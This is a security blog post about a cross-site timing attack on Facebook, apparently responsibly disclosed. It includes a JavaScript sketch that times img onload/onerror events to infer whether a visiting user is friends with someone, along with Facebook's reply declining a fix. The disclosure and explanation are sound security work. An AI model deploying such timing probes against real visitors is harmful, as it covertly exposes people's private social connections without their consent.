Continuing on the subject of timing attacks, I recently found a small timing attack exploit on Facebook. I sent a disclosure to the security team, but it wasn’t found to be serious enough to warrant a bug bounty. I did not expect it to be either, and I agree with the response I got from the Facebook engineer.
The exploit is simple. Imagine a Facebook user A is visiting my site, and I want to know if A is friends with another user B, whom I am friends with. I time how long it takes to load an image uploaded to Facebook by the target user B and compare it to the time taken to load an image which user A definitely does not have access to.
If user B’s image takes longer to load, then user A has access to it.
The way this works is that the server’s response behaves differently depending on whether user A has access or not. It sends less data, and perhaps short-circuits, if the user does not have access, resulting in a faster response time. On my network the server took 300 ms longer to respond when the user had access than when not, enough to reliably tell the difference.
I wrote a proof of concept and set up three test accounts to test it. I used img tags and the onerror attribute to get the timing information, which also gets around Facebook’s iframe restrictions. See the exploit code here.
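The measurement can be sketched roughly like this. This is not my original exploit code, just a minimal illustration of the technique; the URLs and the 150 ms threshold are assumptions, and in practice you would average several measurements to smooth out network jitter.

```javascript
// Time how long an <img> request takes. Loading a cross-origin photo from
// a third-party page may fail either way, but onload/onerror only fire
// after the server has responded, so the elapsed time still leaks.
function timeImageLoad(url) {
  return new Promise((resolve) => {
    const start = performance.now();
    const img = new Image();
    // Either handler fires once the response is in; both give us the
    // round-trip time regardless of whether the image rendered.
    img.onload = img.onerror = () => resolve(performance.now() - start);
    img.src = url;
  });
}

// Compare a measurement against a baseline taken from an image the
// visitor certainly cannot access. A gap well above network jitter
// (I observed roughly 300 ms) suggests the slower "has access" path.
// The 150 ms threshold here is an illustrative assumption.
function looksAccessible(measuredMs, baselineMs, thresholdMs = 150) {
  return measuredMs - baselineMs > thresholdMs;
}
```

In the browser you would call something like `timeImageLoad(targetPhotoUrl)` and `timeImageLoad(inaccessiblePhotoUrl)` and feed both numbers to `looksAccessible` (both URLs being hypothetical placeholders here).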
Of course, this is a very minor exploit, since you could likely get the same information by looking at user B’s friends list, unless he explicitly disabled it in the privacy settings. Perhaps the same type of attack could be used elsewhere to learn more private information. Either way, I feel like I learned something new while coding this exploit.
In case you were interested, here is the reply I got from Facebook:
This is an interesting idea! Like you, I don't know how something like this would be fixed. The simplest idea would be to slow down the fast requests by X amount, so they match the speed of the Y (slower) requests, but can you imagine going to a product team and asking something like, "Hey, can we slow down 98% of all requests on the entire site, globally, so that they're never faster than our slowest requests?"
I don't think this is something we could reasonably fix, even ignoring the problems and confounding variables of network latency, etc -- all those things that would reduce the practicality of this.
Unfortunately, I think all of the above makes this ineligible as a bug bounty. Still, I applaud the creative thinking here and hope you'll continue to send in any security-related issues you find in the future.
So I guess it’s marked as WONTFIX. I don’t disagree with his assessment; engineering a fix for such a minor issue would not be worth it.